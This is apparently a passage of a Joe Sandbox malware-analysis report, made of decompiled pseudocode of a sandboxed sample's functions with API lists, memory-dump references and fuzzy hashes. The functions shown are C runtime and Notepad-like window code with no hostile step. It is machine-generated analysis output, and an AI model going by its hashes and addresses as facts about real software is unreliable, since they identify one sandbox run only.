                      0x004010a5
                      0x004010a5
                      0x004010ab
                      0x004010ab
                      0x004010b5

                      APIs
                      • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
                      • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
                      • RegCloseKey.ADVAPI32(?), ref: 004010AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: LogPixels$Software\Fonts
                      • API String ID: 3677997916-4238338266
                      • Opcode ID: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
                      • Instruction ID: a9dc7ae54450fe8809de1ee31deae739da478254df8c1b302dfb453a41a3a578
                      • Opcode Fuzzy Hash: 34b995cda39885bd0091ff1aef1a18e8392eafd054f4e5ed3edcd8db48220016
                      • Instruction Fuzzy Hash: 6CF03776A00209FADB209B94DC04FEFBBB8EB44705F104177EA41B2190E6B49A88CB19
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0040C5DF(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                      				void* _t7;
                      				long _t8;
                      				intOrPtr* _t9;
                      				intOrPtr* _t12;
                      				long _t27;
                      				long _t30;
                      
                      				if(_a4 != 0) {
                      					_push(__esi);
                      					_t30 = _a8;
                      					__eflags = _t30;
                      					if(_t30 != 0) {
                      						_push(__edi);
                      						while(1) {
                      							__eflags = _t30 - 0xffffffe0;
                      							if(_t30 > 0xffffffe0) {
                      								break;
                      							}
                      							__eflags = _t30;
                      							if(_t30 == 0) {
                      								_t30 = _t30 + 1;
                      								__eflags = _t30;
                      							}
                      							_t7 = HeapReAlloc( *0x415a64, 0, _a4, _t30);
                      							_t27 = _t7;
                      							__eflags = _t27;
                      							if(_t27 != 0) {
                      								L17:
                      								_t8 = _t27;
                      							} else {
                      								__eflags =  *0x415f58 - _t7;
                      								if(__eflags == 0) {
                      									_t9 = E0040370A(__eflags);
                      									 *_t9 = E004036C8(GetLastError());
                      									goto L17;
                      								} else {
                      									__eflags = E0040B343(_t7, _t30);
                      									if(__eflags == 0) {
                      										_t12 = E0040370A(__eflags);
                      										 *_t12 = E004036C8(GetLastError());
                      										L12:
                      										_t8 = 0;
                      										__eflags = 0;
                      									} else {
                      										continue;
                      									}
                      								}
                      							}
                      							goto L14;
                      						}
                      						E0040B343(_t6, _t30);
                      						 *((intOrPtr*)(E0040370A(__eflags))) = 0xc;
                      						goto L12;
                      					} else {
                      						E00408BC0(_a4);
                      						_t8 = 0;
                      					}
                      					L14:
                      					return _t8;
                      				} else {
                      					return E0040C4C9(__edx, __edi, __esi, _a8);
                      				}
                      			}









                      0x0040c5e8
                      0x0040c5f5
                      0x0040c5f6
                      0x0040c5f9
                      0x0040c5fb
                      0x0040c60a
                      0x0040c63d
                      0x0040c63d
                      0x0040c640
                      0x00000000
                      0x00000000
                      0x0040c60d
                      0x0040c60f
                      0x0040c611
                      0x0040c611
                      0x0040c611
                      0x0040c61e
                      0x0040c624
                      0x0040c626
                      0x0040c628
                      0x0040c688
                      0x0040c688
                      0x0040c62a
                      0x0040c62a
                      0x0040c630
                      0x0040c672
                      0x0040c686
                      0x00000000
                      0x0040c632
                      0x0040c639
                      0x0040c63b
                      0x0040c65a
                      0x0040c66e
                      0x0040c654
                      0x0040c654
                      0x0040c654
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040c63b
                      0x0040c630
                      0x00000000
                      0x0040c656
                      0x0040c643
                      0x0040c64e
                      0x00000000
                      0x0040c5fd
                      0x0040c600
                      0x0040c606
                      0x0040c606
                      0x0040c657
                      0x0040c659
                      0x0040c5ea
                      0x0040c5f4
                      0x0040c5f4

                      APIs
                      • _malloc.LIBCMT ref: 0040C5ED
                        • Part of subcall function 0040C4C9: __FF_MSGBANNER.LIBCMT ref: 0040C4E2
                        • Part of subcall function 0040C4C9: __NMSG_WRITE.LIBCMT ref: 0040C4E9
                        • Part of subcall function 0040C4C9: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00408C0B,00000000,00000001,00000000,?,0040A2E2,00000018,00412270,0000000C,0040A372), ref: 0040C50E
                      • _free.LIBCMT ref: 0040C600
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: AllocateHeap_free_malloc
                      • String ID:
                      • API String ID: 1020059152-0
                      • Opcode ID: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
                      • Instruction ID: 6a77f78aa43c2d9d91f7950ce4b899985eb708febcdd106683cded96f858de10
                      • Opcode Fuzzy Hash: fefdf8a66b65aac27a5e3c921786e7e5e3cdc4d72facf406c1a772385b061672
                      • Instruction Fuzzy Hash: F411C432410615EACB313FB1AC456AA3B589B543A1F308B3BF849B72D1DB3E8941969C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004010B6() {
                      				void* _v8;
                      				void* _v12;
                      				void* _v524;
                      				long _t13;
                      				long _t18;
                      				int _t19;
                      				int _t23;
                      
                      				SendMessageW( *0x415f6c, 0xb0,  &_v12,  &_v8);
                      				_t19 = _v12;
                      				if(_t19 == _v8) {
                      					 *0x4170f0 = _t19;
                      				}
                      				if(_t19 >=  *0x4170f0) {
                      					_t19 = _v8;
                      				}
                      				_t23 = SendMessageW( *0x415f6c, 0xc9, _t19, 0);
                      				_t13 = SendMessageW( *0x415f6c, 0xbb, _t23, 0);
                      				if( *0x4170f4 != _t23 ||  *0x4170f8 != _t19) {
                      					_t6 = _t23 + 1; // 0x1
                      					swprintf( &_v524, 0x231,  *0x415f7c, _t6, _t19 - _t13 + 1);
                      					_t18 = SendMessageW( *0x415f74, 0x29, 0,  &_v524);
                      					 *0x4170f4 = _t23;
                      					 *0x4170f8 = _t19;
                      					return _t18;
                      				}
                      				return _t13;
                      			}










                      0x004010db
                      0x004010dd
                      0x004010e3
                      0x004010e5
                      0x004010e5
                      0x004010f1
                      0x004010f3
                      0x004010f3
                      0x00401108
                      0x00401116
                      0x0040111e
                      0x0040112e
                      0x00401144
                      0x0040115d
                      0x0040115f
                      0x00401165
                      0x00000000
                      0x00401165
                      0x0040116f

                      APIs
                      • SendMessageW.USER32(000000B0,?,?), ref: 004010DB
                      • SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
                      • SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
                      • swprintf.LIBCMT ref: 00401144
                      • SendMessageW.USER32(00000029,00000000,?), ref: 0040115D
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: MessageSend$swprintf
                      • String ID:
                      • API String ID: 3793038206-0
                      • Opcode ID: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
                      • Instruction ID: 66af78921c5875677350cfaec2ba26a2b368e15f8c7f004a64a750f81ebf7e58
                      • Opcode Fuzzy Hash: 2fd1dc92b16ec5f4e4f75ff0f9bcaf04bd9515726b0b656210148fd59d724adf
                      • Instruction Fuzzy Hash: 1F119E76A40309FFDB11DB94EC85FEA7BBCE748700F108177E650A61A1E3B12E458B68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E004089C0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed int _t12;
                      				void* _t28;
                      				intOrPtr _t29;
                      				void* _t30;
                      				void* _t31;
                      
                      				_t31 = __eflags;
                      				_t26 = __edi;
                      				_t25 = __edx;
                      				_t20 = __ebx;
                      				_push(0xc);
                      				_push(0x4121e8);
                      				E00405990(__ebx, __edi, __esi);
                      				_t28 = E004072A9(__ebx, __edx, _t31);
                      				_t12 =  *0x414aa8; // 0xfffffffe
                      				if(( *(_t28 + 0x70) & _t12) == 0) {
                      					L6:
                      					E0040A357(_t20, _t26, 0xc);
                      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                      					_t29 = _t28 + 0x6c;
                      					 *((intOrPtr*)(_t30 - 0x1c)) = E00408973(_t29,  *0x414cf0);
                      					 *(_t30 - 4) = 0xfffffffe;
                      					E00408A2D();
                      				} else {
                      					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                      						goto L6;
                      					} else {
                      						_t29 =  *((intOrPtr*)(E004072A9(_t20, __edx, _t33) + 0x6c));
                      					}
                      				}
                      				_t34 = _t29;
                      				if(_t29 == 0) {
                      					_push(0x20);
                      					E004069B9(_t25, _t34);
                      				}
                      				return E004059D5(_t29);
                      			}








                      0x004089c0
                      0x004089c0
                      0x004089c0
                      0x004089c0
                      0x004089c0
                      0x004089c2
                      0x004089c7
                      0x004089d1
                      0x004089d3
                      0x004089db
                      0x004089ff
                      0x00408a01
                      0x00408a07
                      0x00408a11
                      0x00408a1c
                      0x00408a1f
                      0x00408a26
                      0x004089dd
                      0x004089dd
                      0x004089e1
                      0x00000000
                      0x004089e3
                      0x004089e8
                      0x004089e8
                      0x004089e1
                      0x004089eb
                      0x004089ed
                      0x004089ef
                      0x004089f1
                      0x004089f6
                      0x004089fe

                      APIs
                      • __getptd.LIBCMT ref: 004089CC
                        • Part of subcall function 004072A9: __getptd_noexit.LIBCMT ref: 004072AC
                        • Part of subcall function 004072A9: __amsg_exit.LIBCMT ref: 004072B9
                      • __getptd.LIBCMT ref: 004089E3
                      • __amsg_exit.LIBCMT ref: 004089F1
                      • __lock.LIBCMT ref: 00408A01
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00408A15
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                      • String ID:
                      • API String ID: 938513278-0
                      • Opcode ID: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
                      • Instruction ID: 976e5cdb44841edbfc45673e9f197270e52d64d1e78c74b2d10079b09f234e8e
                      • Opcode Fuzzy Hash: 0048ee2e9d654e88571322e1a7f2b20f4c6b62c7380a38d321b6e8247d482b4b
                      • Instruction Fuzzy Hash: C3F062B2904601ABD625BBAA5906B6E32909F00724F15416FF494B62D3CF7C59409A5F
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004057DE() {
                      				intOrPtr _t5;
                      				intOrPtr _t6;
                      				intOrPtr _t10;
                      				void* _t12;
                      				intOrPtr _t15;
                      				intOrPtr* _t16;
                      				signed int _t19;
                      				signed int _t20;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      
                      				_t5 =  *0x4182a0;
                      				_t26 = 0x14;
                      				if(_t5 != 0) {
                      					if(_t5 < _t26) {
                      						_t5 = _t26;
                      						goto L4;
                      					}
                      				} else {
                      					_t5 = 0x200;
                      					L4:
                      					 *0x4182a0 = _t5;
                      				}
                      				_t6 = E00408C3F(_t5, 4);
                      				 *0x417284 = _t6;
                      				if(_t6 != 0) {
                      					L8:
                      					_t19 = 0;
                      					_t15 = 0x4142b0;
                      					while(1) {
                      						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                      						_t15 = _t15 + 0x20;
                      						_t19 = _t19 + 4;
                      						if(_t15 >= 0x414530) {
                      							break;
                      						}
                      						_t6 =  *0x417284;
                      					}
                      					_t27 = 0xfffffffe;
                      					_t20 = 0;
                      					_t16 = 0x4142c0;
                      					do {
                      						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x417180 + (_t20 >> 5) * 4))));
                      						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                      							 *_t16 = _t27;
                      						}
                      						_t16 = _t16 + 0x20;
                      						_t20 = _t20 + 1;
                      					} while (_t16 < 0x414320);
                      					return 0;
                      				} else {
                      					 *0x4182a0 = _t26;
                      					_t6 = E00408C3F(_t26, 4);
                      					 *0x417284 = _t6;
                      					if(_t6 != 0) {
                      						goto L8;
                      					} else {
                      						_t12 = 0x1a;
                      						return _t12;
                      					}
                      				}
                      			}













                      0x004057de
                      0x004057e6
                      0x004057e9
                      0x004057f4
                      0x004057f6
                      0x00000000
                      0x004057f6
                      0x004057eb
                      0x004057eb
                      0x004057f8
                      0x004057f8
                      0x004057f8
                      0x00405800
                      0x00405807
                      0x0040580e
                      0x0040582e
                      0x0040582e
                      0x00405830
                      0x0040583c
                      0x0040583c
                      0x0040583f
                      0x00405842
                      0x0040584b
                      0x00000000
                      0x00000000
                      0x00405837
                      0x00405837
                      0x0040584f
                      0x00405850
                      0x00405852
                      0x00405858
                      0x0040586c
                      0x00405872
                      0x0040587c
                      0x0040587c
                      0x0040587e
                      0x00405881
                      0x00405882
                      0x0040588e
                      0x00405810
                      0x00405813
                      0x00405819
                      0x00405820
                      0x00405827
                      0x00000000
                      0x00405829
                      0x0040582b
                      0x0040582d
                      0x0040582d
                      0x00405827

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __calloc_crt
                      • String ID: CA$0EA
                      • API String ID: 3494438863-962656358
                      • Opcode ID: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
                      • Instruction ID: 86693eefe5dd9b7c921068e51d74e635daad96af07061ee7db7e118806e0be7c
                      • Opcode Fuzzy Hash: e9080e8dac64272fba36a94873b48f66def676edf17581a6cb3ff4e48fb4461a
                      • Instruction Fuzzy Hash: 7111E772704A155BE7249F1EBD406A73395EB84364B24817FF914E73D0EB3CC8825A4C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00408D7B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				signed int _v12;
                      				char _v20;
                      				char _t43;
                      				char _t46;
                      				signed int _t53;
                      				signed int _t54;
                      				intOrPtr _t56;
                      				int _t57;
                      				int _t58;
                      				char _t59;
                      				short* _t60;
                      				int _t65;
                      				char* _t73;
                      
                      				_t73 = _a8;
                      				if(_t73 == 0 || _a12 == 0) {
                      					L5:
                      					return 0;
                      				} else {
                      					if( *_t73 != 0) {
                      						E00403753( &_v20, __edi, _a16);
                      						_t43 = _v20;
                      						__eflags =  *(_t43 + 0x14);
                      						if( *(_t43 + 0x14) != 0) {
                      							_t46 = E00408EAB( *_t73 & 0x000000ff,  &_v20);
                      							__eflags = _t46;
                      							if(_t46 == 0) {
                      								__eflags = _a4;
                      								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                      								if(__eflags != 0) {
                      									L10:
                      									__eflags = _v8;
                      									if(_v8 != 0) {
                      										_t53 = _v12;
                      										_t11 = _t53 + 0x70;
                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                      										__eflags =  *_t11;
                      									}
                      									return 1;
                      								}
                      								L21:
                      								_t54 = E0040370A(__eflags);
                      								 *_t54 = 0x2a;
                      								__eflags = _v8;
                      								if(_v8 != 0) {
                      									_t54 = _v12;
                      									_t33 = _t54 + 0x70;
                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                      									__eflags =  *_t33;
                      								}
                      								return _t54 | 0xffffffff;
                      							}
                      							_t56 = _v20;
                      							_t65 =  *(_t56 + 0xac);
                      							__eflags = _t65 - 1;
                      							if(_t65 <= 1) {
                      								L17:
                      								__eflags = _a12 -  *(_t56 + 0xac);
                      								if(__eflags < 0) {
                      									goto L21;
                      								}
                      								__eflags = _t73[1];
                      								if(__eflags == 0) {
                      									goto L21;
                      								}
                      								L19:
                      								_t57 =  *(_t56 + 0xac);
                      								__eflags = _v8;
                      								if(_v8 == 0) {
                      									return _t57;
                      								}
                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                      								return _t57;
                      							}
                      							__eflags = _a12 - _t65;
                      							if(_a12 < _t65) {
                      								goto L17;
                      							}
                      							__eflags = _a4;
                      							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                      							__eflags = _t58;
                      							_t56 = _v20;
                      							if(_t58 != 0) {
                      								goto L19;
                      							}
                      							goto L17;
                      						}
                      						_t59 = _a4;
                      						__eflags = _t59;
                      						if(_t59 != 0) {
                      							 *_t59 =  *_t73 & 0x000000ff;
                      						}
                      						goto L10;
                      					} else {
                      						_t60 = _a4;
                      						if(_t60 != 0) {
                      							 *_t60 = 0;
                      						}
                      						goto L5;
                      					}
                      				}
                      			}

















                      0x00408d85
                      0x00408d8c
                      0x00408da3
                      0x00000000
                      0x00408d93
                      0x00408d95
                      0x00408daf
                      0x00408db4
                      0x00408db7
                      0x00408dba
                      0x00408de2
                      0x00408de9
                      0x00408deb
                      0x00408e6c
                      0x00408e87
                      0x00408e89
                      0x00408dc9
                      0x00408dc9
                      0x00408dcc
                      0x00408dce
                      0x00408dd1
                      0x00408dd1
                      0x00408dd1
                      0x00408dd1
                      0x00000000
                      0x00408dd7
                      0x00408e4b
                      0x00408e4b
                      0x00408e50
                      0x00408e56
                      0x00408e59
                      0x00408e5b
                      0x00408e5e
                      0x00408e5e
                      0x00408e5e
                      0x00408e5e
                      0x00000000
                      0x00408e62
                      0x00408ded
                      0x00408df0
                      0x00408df6
                      0x00408df9
                      0x00408e20
                      0x00408e23
                      0x00408e29
                      0x00000000
                      0x00000000
                      0x00408e2b
                      0x00408e2e
                      0x00000000
                      0x00000000
                      0x00408e30
                      0x00408e30
                      0x00408e36
                      0x00408e39
                      0x00408da8
                      0x00408da8
                      0x00408e42
                      0x00000000
                      0x00408e42
                      0x00408dfb
                      0x00408dfe
                      0x00000000
                      0x00000000
                      0x00408e02
                      0x00408e13
                      0x00408e19
                      0x00408e1b
                      0x00408e1e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00408e1e
                      0x00408dbc
                      0x00408dbf
                      0x00408dc1
                      0x00408dc6
                      0x00408dc6
                      0x00000000
                      0x00408d97
                      0x00408d97
                      0x00408d9c
                      0x00408da0
                      0x00408da0
                      0x00000000
                      0x00408d9c
                      0x00408d95

                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00408DAF
                      • __isleadbyte_l.LIBCMT ref: 00408DE2
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,?,00000000,00000000,?,?,?,?,004029D6), ref: 00408E13
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,004029D6,00000001,00000000,00000000,?,?,?,?,004029D6), ref: 00408E81
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
                      • Instruction ID: 0c9ba43707c01210f15d82bc915928d229edbab3a984a60048fa1d6b0ab5e1b1
                      • Opcode Fuzzy Hash: 146e9b4077365b13abf7a7884f3efbec45004c9151c7c70d510fedc203469ba8
                      • Instruction Fuzzy Hash: BF31B131A00245EFDB20DFA4CD849AA3BB5EF41310F24867EE4A5AB2D1DB38DD41DB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404E68(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				intOrPtr _t25;
                      				void* _t26;
                      
                      				_t25 = _a16;
                      				if(_t25 == 0x65 || _t25 == 0x45) {
                      					_t26 = E0040475A(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                      					goto L9;
                      				} else {
                      					_t35 = _t25 - 0x66;
                      					if(_t25 != 0x66) {
                      						__eflags = _t25 - 0x61;
                      						if(_t25 == 0x61) {
                      							L7:
                      							_t26 = E00404841(_a4, _a8, _a12, _a20, _a24, _a28);
                      						} else {
                      							__eflags = _t25 - 0x41;
                      							if(__eflags == 0) {
                      								goto L7;
                      							} else {
                      								_t26 = E00404D7B(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                      							}
                      						}
                      						L9:
                      						return _t26;
                      					} else {
                      						return E00404CBA(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                      					}
                      				}
                      			}





                      0x00404e6d
                      0x00404e73
                      0x00404ee6
                      0x00000000
                      0x00404e7a
                      0x00404e7a
                      0x00404e7d
                      0x00404e98
                      0x00404e9b
                      0x00404ebb
                      0x00404ecd
                      0x00404e9d
                      0x00404e9d
                      0x00404ea0
                      0x00000000
                      0x00404ea2
                      0x00404eb4
                      0x00404eb4
                      0x00404ea0
                      0x00404eeb
                      0x00404eef
                      0x00404e7f
                      0x00404e97
                      0x00404e97
                      0x00404e7d

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                      • Instruction ID: 908501024bb7c2d4d9aded8cda733e96d04f0b6ba79867bc6ebe503863c54618
                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                      • Instruction Fuzzy Hash: 1F11877200014ABBCF165E85CC05CEE3F63BB99354B158926FF1865170D33AD971AB85
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00401F1C(intOrPtr _a4) {
                      				short _v516;
                      				short _v1028;
                      
                      				LoadStringW( *0x415f60, 0x179,  &_v516, 3);
                      				wsprintfW( &_v1028,  &_v516, _a4);
                      				LoadStringW( *0x415f60, 0x171,  &_v516, 6);
                      				return MessageBoxW( *0x415f64,  &_v1028,  &_v516, 0x33);
                      			}





                      0x00401f40
                      0x00401f53
                      0x00401f70
                      0x00401f90

                      APIs
                      • LoadStringW.USER32(00000179,?,00000003), ref: 00401F40
                      • wsprintfW.USER32 ref: 00401F53
                      • LoadStringW.USER32(00000171,?,00000006), ref: 00401F70
                      • MessageBoxW.USER32(?,?,00000033), ref: 00401F88
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: LoadString$Messagewsprintf
                      • String ID:
                      • API String ID: 3675432989-0
                      • Opcode ID: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
                      • Instruction ID: f1b68f74e27ae39634cdf6190571022c2f1221254ce974dc298a2efd5b2adec8
                      • Opcode Fuzzy Hash: 6152b0956492ec3cf6523048a842ee4a54b8dfacaea3a4816d912d05a09726db
                      • Instruction Fuzzy Hash: 08F01D7690021CBBEB119B50DC89FEA7B7DFB08304F0840B6BB08A60A1D6B15A55CF98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00402130() {
                      				struct tagRECT _v20;
                      				signed int _t7;
                      				signed int _t14;
                      				signed int _t20;
                      
                      				_t20 =  *0x415f78; // 0x0
                      				_t7 = 0 | _t20 == 0x00000000;
                      				 *0x415f78 = _t7;
                      				asm("sbb eax, eax");
                      				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t7 & 0x00000008);
                      				GetClientRect( *0x415f64,  &_v20);
                      				_t14 =  *0x415f78; // 0x0
                      				asm("sbb eax, eax");
                      				ShowWindow( *0x415f74,  ~_t14 & 0x00000005);
                      				E00401170(_v20.right, _v20.bottom);
                      				return E004010B6();
                      			}







                      0x00402138
                      0x0040213e
                      0x00402141
                      0x00402148
                      0x00402160
                      0x00402170
                      0x00402176
                      0x0040217d
                      0x00402189
                      0x00402195
                      0x004021a0

                      APIs
                      • GetMenu.USER32(00000205), ref: 00402159
                      • CheckMenuItem.USER32(00000000), ref: 00402160
                      • GetClientRect.USER32 ref: 00402170
                      • ShowWindow.USER32(00000000), ref: 00402189
                        • Part of subcall function 00401170: SendMessageW.USER32(00000005,00000000,00000000), ref: 0040118D
                        • Part of subcall function 00401170: GetWindowRect.USER32 ref: 0040119D
                        • Part of subcall function 00401170: SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000204), ref: 004011C0
                        • Part of subcall function 004010B6: SendMessageW.USER32(000000B0,?,?), ref: 004010DB
                        • Part of subcall function 004010B6: SendMessageW.USER32(000000C9,?,00000000), ref: 00401104
                        • Part of subcall function 004010B6: SendMessageW.USER32(000000BB,00000000,00000000), ref: 00401116
                        • Part of subcall function 004010B6: swprintf.LIBCMT ref: 00401144
                        • Part of subcall function 004010B6: SendMessageW.USER32(00000029,00000000,?), ref: 0040115D
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: MessageSend$Window$MenuRect$CheckClientItemShowswprintf
                      • String ID:
                      • API String ID: 2422921040-0
                      • Opcode ID: 26df89c260fec66ca14058d467dbf074c9a1d408edb5bc0189cbaaa82187ce34
                      • Instruction ID: 2110b4cd67f0e5a39b5caf6ff6ab68c74d55df39b8f184eadb547ce7c05df833
